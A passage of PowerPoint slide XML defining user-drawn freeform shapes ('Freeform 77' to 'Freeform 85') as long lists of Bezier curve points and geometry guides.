                      <a:pt x="22" y="185"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>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Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6175"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5"/>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Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6324"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Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6519" y="2929"/>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Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944" y="292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5"/>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Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7287" y="2929"/>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Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7484" y="292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5"/>
                      <a:pt x="19"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Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7633" y="2929"/>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0"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="185"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="134"/>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Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="2920"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 173 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 201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7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3 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 67 h 209"/>
                  <a:gd name="T46" fmla="*/ 74 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 64 w 179"/>
                  <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 145 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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1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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="208"/>
                      <a:pt x="128" y="208"/>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3"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="198"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="193"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="154"/>
                      <a:pt x="23" y="149"/>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3"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="170"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="184"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="193"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="198"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="203"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="185"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="142"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="144"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="136"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="86"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="67"/>
                      <a:pt x="60" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="57"/>
                      <a:pt x="59" y="50"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="32"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="0"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="39"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="158"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="153"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="147"/>
                      <a:pt x="125" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="170"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="188"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="204"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="183"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="172"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="157"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="65"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="66"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="81"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="76"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="70"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="72"/>
                      <a:pt x="65" y="74"/>
                      <a:pt x="64" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="88"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="98"/>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="137"/>
                      <a:pt x="46"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0"/>
                      <a:pt x="38" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="137"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="166"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="174"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="185"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="193"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="182"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="185"/>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2"/>
                      <a:pt x="117" y="173"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="174"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="145"/>
                      <a:pt x="126" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="145"/>
                      <a:pt x="127" y="145"/>
                      <a:pt x="127" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="137"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="116"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="137"/>
                      <a:pt x="132" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="132"/>
                      <a:pt x="128" y="130"/>
                      <a:pt x="128" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="102"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="78"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="55"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="50"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="46"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="43"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="45"/>
                      <a:pt x="80" y="45"/>
                      <a:pt x="80" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="34"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
